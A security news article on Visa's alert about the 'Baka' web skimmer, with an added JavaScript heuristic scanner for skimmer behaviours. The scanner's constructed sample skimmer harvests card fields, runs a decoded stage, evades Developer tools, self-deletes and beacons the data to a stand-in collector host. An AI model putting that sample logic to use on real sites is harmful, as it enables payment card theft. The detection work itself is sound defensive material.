Visa has released a security alert regarding a new advanced e-skimmer dubbed “Baka” that implements new features to evade detection and is able to remove itself once payment card details have been exfiltrated.
The malware was discovered by researchers with Visa's Payment Fraud Disruption (PFD) initiative in February 2020 while they were analyzing a command and control (C2) server previously observed hosting the ImageID skimmer variant. Although the skimmer itself is basic and uses techniques common to many e-commerce skimming kits, such as exfiltrating stolen data through image requests and reading a configurable list of target form fields, Baka has advanced capabilities that suggest it was developed by a skilled malware author.
“The most compelling components of this kit are the unique loader and obfuscation method. The skimmer loads dynamically to avoid static malware scanners and uses unique encryption parameters for each victim to obfuscate the malicious code. PFD assesses that this skimmer variant avoids detection and analysis by removing itself from memory when it detects the possibility of dynamic analysis with Developer tools or when data has been successfully exfiltrated,” the warning said.
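The behaviours described above (image-request exfiltration, configurable target form fields, a runtime loader, Developer tools detection and self-removal) are all visible in script source once the per-victim encryption layer has been stripped, so a first-pass triage can be done with a small heuristic scanner. The following is an added example written for this article, not code from Visa's alert or from the Baka kit itself: the rule set, weights, threshold, the first-party allowlist (`shop.example`, `cdn.shop.example`) and both sample scripts are constructed assumptions, and the "skimmer" sample only imitates the behaviours the alert describes.

```javascript
// Heuristic triage scanner for client-side skimmer behaviours.
// Added example for this article; not the Visa alert's or Baka's code.
// Allowlist, rules, weights and samples below are assumptions for the demo.

// Hosts a merchant considers first-party (assumed for this example).
const FIRST_PARTY = new Set(["shop.example", "cdn.shop.example"]);

const RULES = [
  { id: "image-beacon-exfil", weight: 3,
    // new Image() whose src is assembled at runtime (query string or concatenation)
    re: /new\s+Image\s*\([^)]*\)[\s\S]{0,300}?\.src\s*=\s*[^;\n]*[+?]/ },
  { id: "payment-field-harvest", weight: 2,
    // DOM selectors aimed at card-related inputs ("configurable target form fields")
    re: /(?:querySelector(?:All)?|getElementsByName)\s*\([^)]*(?:card|cvv|cvc|expir|ccnum)[^)]*\)/i },
  { id: "dynamic-loader", weight: 2,
    // a further stage decoded and executed at runtime to dodge static scanners
    re: /\b(?:eval|Function)\s*\(|document\.createElement\s*\(\s*["'`]script["'`]\s*\)/ },
  { id: "devtools-detection", weight: 2,
    // window-size delta or debugger-timing tricks used to spot Developer tools
    re: /outerWidth\s*-\s*(?:window\.)?innerWidth|outerHeight\s*-\s*(?:window\.)?innerHeight|new\s+Date\s*\(\)[\s\S]{0,80}?debugger/ },
  { id: "self-removal", weight: 2,
    // the script deletes its own <script> element after exfiltration or on analysis
    re: /document\.currentScript[\s\S]*?(?:\.remove\s*\(\s*\)|removeChild)/ },
];

// Hostnames referenced by the script that are not on the first-party allowlist.
function externalHosts(src) {
  const hosts = new Set();
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = re.exec(src)) !== null) {
    const host = m[1].toLowerCase();
    if (!FIRST_PARTY.has(host)) hosts.add(host);
  }
  return [...hosts];
}

// Returns matched rule ids, a weighted score and the off-allowlist hosts,
// plus a verdict once the score reaches the (assumed) threshold.
function scanScript(src, threshold = 5) {
  const matched = RULES.filter((r) => r.re.test(src));
  const score = matched.reduce((sum, r) => sum + r.weight, 0);
  return {
    hits: matched.map((r) => r.id),
    score,
    externalHosts: externalHosts(src),
    suspicious: score >= threshold,
  };
}

// Constructed sample imitating the behaviours the alert describes (not the real kit).
const SAMPLE_SKIMMER = `
(function () {
  var stage2 = "dmFyIHg9MTs=";            // a further stage decoded and run at load time
  new Function(atob(stage2))();
  var me = document.currentScript;
  if (window.outerWidth - window.innerWidth > 160) { me.remove(); return; } // dev tools open?
  var fields = document.querySelectorAll("input[name*='card'],input[name*='cvv'],input[name*='expiry']");
  var data = "";
  fields.forEach(function (f) { data += f.name + "=" + encodeURIComponent(f.value) + "&"; });
  var img = new Image();
  img.onload = function () { me.remove(); };  // vanish once the beacon has been sent
  img.src = "https://collector.example.net/i.gif?d=" + btoa(data);
})();
`;

// Constructed benign sample: a first-party tracking pixel and a cart counter.
const SAMPLE_BENIGN = `
var img = new Image();
img.src = "https://cdn.shop.example/pixel.gif";
document.querySelector("#cart-count").textContent = items.length;
`;

console.log(JSON.stringify(scanScript(SAMPLE_SKIMMER), null, 2));
console.log(JSON.stringify(scanScript(SAMPLE_BENIGN), null, 2));
```

Because Baka re-encrypts its code per victim, these rules only fire on a decoded stage; the `externalHosts` list is the part worth keeping even when the rules stay quiet, since a beacon host outside the merchant's allowlist is the pivot back to the C2 infrastructure and to the IoCs Visa publishes.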
Using Visa's eCommerce Threat Disruption (eTD) capability, PFD researchers identified the Baka skimmer on several merchant websites across multiple regions.
Visa's security alert also provides Indicators of Compromise (IoCs) along with best practices and mitigation measures that organizations can implement to defend themselves against this threat.